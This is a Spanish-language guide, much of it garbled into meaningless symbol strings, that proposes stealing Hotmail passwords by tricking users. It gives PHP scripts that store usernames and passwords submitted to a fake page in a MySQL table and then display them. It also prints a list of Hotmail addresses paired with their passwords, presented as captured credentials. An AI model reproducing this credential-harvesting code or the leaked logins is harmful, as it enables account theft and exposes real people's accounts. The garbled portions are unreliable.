You are on page 1of 10

Siempre hay alguien que por alguna razón me pregunta si puedo “hackear” —el término

más adecuado creo que es “crackear”— las contraseñas de las cuentas de Hotmail. Por supuesto
les digo que no, porque esa es la verdad. No por nada se gastan sus milloncitos para su seguridad
en las cuentas de Hotmail. Atacar a Hotmail, es impensable para un informático de un nivel
“promedio” como yo, pero, partiendo de los 3 elementos participantes en todo esto:
HOSTING HOTMAIL <-----------> cuenta de correo electrónico <-----------> Usuario

Ya hemos entendido que no podemos atacar a HOTMAIL, y que la cuenta de correo en sí no
podemos atacarla, ya que es nuestro objetivo, entonces… ¿Qué nos queda? Exacto, atacar al
usuario…

El presente documento es una propuesta de cómo creo que sería posible (por lo menos en
un 10 %) robar las contraseñas de Hotmail; estoy seguro que hay más formas y mejores, pero
como no las he visto documentadas escribo esto, aún así con la posibilidad de que alguien más
haya ideado algo mejor y también lo haya documentado. Como sea, si a alguien le puede ayudar a
“resolver” esta necesidad, que le aproveche…

Eduardo Robles Pacheco

! "
" " # $% & ' (& ) * +
, , # ) * - . /
+ + 0 & * 1
1

2 )
2 )

! ! " #$ %
& "'

(
!
)
* +
, $

#- . .
%

/0 - !

10 - 2 3

& ! "

* , ,
* 4 !

! 5 $674
* 8 6
! 9

* + ! ! 9
!
2

6 ! !
! 5 ) *
7 ! "
! : ; : :
0 : ! : :

< 9 ! "
: ( = : />?@@A:

5! 9
5 2 3
! 2 ; 3
! 5

B )
* 5
!

2 &

6
9 ; ,
"
;;; 0

9 "
! : 0 : 0
! : 0 C: 0

& 0 9
5 9 ; 4
! ! ; !
9 8 $ 5 ; )
* 9 ! 7D 9 !
7 9 ) *
' 5 ! '

34

+ ! 9 '
) : * 2 3 ) ! : 0
* ! 5 "

* + : "$
0 9
9 2 3 9
0 !

* + ! : 0 " $ 5

5 ! ! ! 5 '
! ! #- ! %E

+ 9 $ D
9 "

2
$ D 3
3

!

" F 5 +
2 ! 5 ; 3 G
0 ,!
5 HF

$ ) *
5 9 4$ !
" !

"

6 9 )
*
! 7 I6 J
9
2
8 3 ) ! "
*
4

) # * K ; C 4 . 9
. " 8 2
8 3
! ( 9 ; 9 ;
, ! !
;
5
) " ! !
$ *

9 ( ,
" 2
8 3 2
8 3 9
! 9 9 ; !
5

" " # $% & ' (& ) *

+ ! #7 9 ! %
& "7 9 ;

& 9 ; 9 9 (
9 L &! "

+ 9 !
9 9
4 "
6

5 9 ; 5 "

/* $ ME& 5 ; "
;;; 0 9
" ;;; 0 N ; N ! N N (
9

1* + ! 5 !
) *
9 )
* 9 ;
;;; ME&
' !

6 ! 9 ;
" ! 2
, 3

9
566 4 $-&

" %5% 6063 7 % 8

66 5 2
, $ 3
5 ( 2L ; &! ,
83 2
+ 3 !
! 4 $-& 5 ! )
% %* 9 ; ) * 6

66 4 $-& 7 A 9
; )& $ $ & $ ' (*
8 ; ! ) % %*
! ;
5 ( ! 5

& 66 9
"

<? $Servidor = "your_servername";$Usuario = "your_user";
$Password = "your_password";$BD = "your_database";

#Instrucción para conectarnos con la Base de Datos.
$Conexion = mysql_connect($Servidor,$Usuario,$Password) or die ("No se ha podido
conectar con la Base de Datos");
#Instrucción para seleccionar la Base de Datos:
mysql_select_db($BD,$Conexion) or die ("No se ha podido seleccionar la Base de Datos");
#Ejemplo de cómo meter los datos en la tabla:
$Query = "insert into TABLA_DE_REGISTROS (USUARIOS, PASSWORDS) values
(‘$text_box_usuario’, ‘$text_box_password’)";
#Ejecutamos la inserción con tal conexión en tal Base de Datos:
$Execute_Query = mysql_query($Query,$Conexion) or die(mysql_error($Conexion));
?>
7

6 9
9:;7:< <= > 39=?3 @3@:= ?3
%:33A ?= 3 9 5 ( 9
! " B C <* C< B C <* C< )
!
2, 3

M 2 3 "

9 "

/0 M ! ) "* 9
2
, $ 3 & C (
! ) (
*

10 7 2
, $ 3
! 6 6) " *"

*0 ;
*07
*0 7 )
* D
!* 0 M !
; ) "

)
!* $
8

, , # ) * - .

8 2
, $ 3

9 9 8
9 !
9

7 4$ 6 9 !
, ( @ 8 ! ; ) K ; C
5 * 9 ! "

/0 9 & , ( @"
"N
N N
/ /?, @ N
/?/

< )
*"

)* + ,
7 ' * C /- (*

10 ; ) 9 ; D
* 9 9 ; 9
!
9

+ + 0 (& ) * &

7 ) * " 9 9 ; )
6 6* D 9 9
D
"
Nombre de usuario Contraseña
preciosura.andando@hotmail.com preciosa25091986
aldo.perezoso@hotmail.com superaldo83
finanzas_cyp@hotmail.com fincyp03
othelo_matinez@hotmail.com Mtzothelo
el_super_portero@hotmail.com cortalemichavo
7 66 9 "

<?
$Servidor = "your_servername";
$Usuario = "your_user";
$Password = "your_password";
$BD = "your_database";

#Instrucción para conectarnos con la Base de Datos.
$Conexion = mysql_connect($Servidor,$Usuario,$Password) or die ("No se ha podido
conectar con la Base de Datos");

#Instrucción para seleccionar la Base de Datos:
mysql_select_db($BD,$Conexion) or die ("No se ha podido seleccionar la Base de Datos");

#Ejemplo de cómo obtener los registros de la tabla:
$Query = "SELECT USUARIOS, PASSWORDS from TABLA_DE_REGISTROS";

#Ejecutamos la consulta con tal conexión en tal Base de Datos:
$Execute_Query = mysql_query($Query,$Conexion) or die(mysql_error($Conexion));
?>

< 9 ! 2 3

9 ) ! *
5 ) (
*"

<table border ='1'; align="center">
<tr> <th>REGISTROS TOTALES </th> </tr>

<?
# Este ciclo imprime los registros en una sola celda. No muestra una tabla típica de las
que usa MySQL, muestra una lista en donde están todos los campos contenidos en una sola
celda. Falta hacer la paginación de los resultados y el intercalado de los colores para
diferencias los registros.

while($Registros = mysql_fetch_array($Execute_Query))
{
if ($colorfila==0) {$color="#DEDEBE";$colorfila=1;}
else {$color="#F0F0F0";$colorfila=0;}

#Aquí imprimimos dando color y formato a los campos deseados:

echo "<tr><td bgcolor='".$color."'><font face='Courier New' size='2'>";
echo "USUARIO: ".$Registros['USUARIOS']. '<br/>';
echo "CONTRASEÑA: ".$Registros['PASSWORDS']. '<br/>';
echo '</font></td></tr>';
}
echo '<table/>';
?>

< A? A H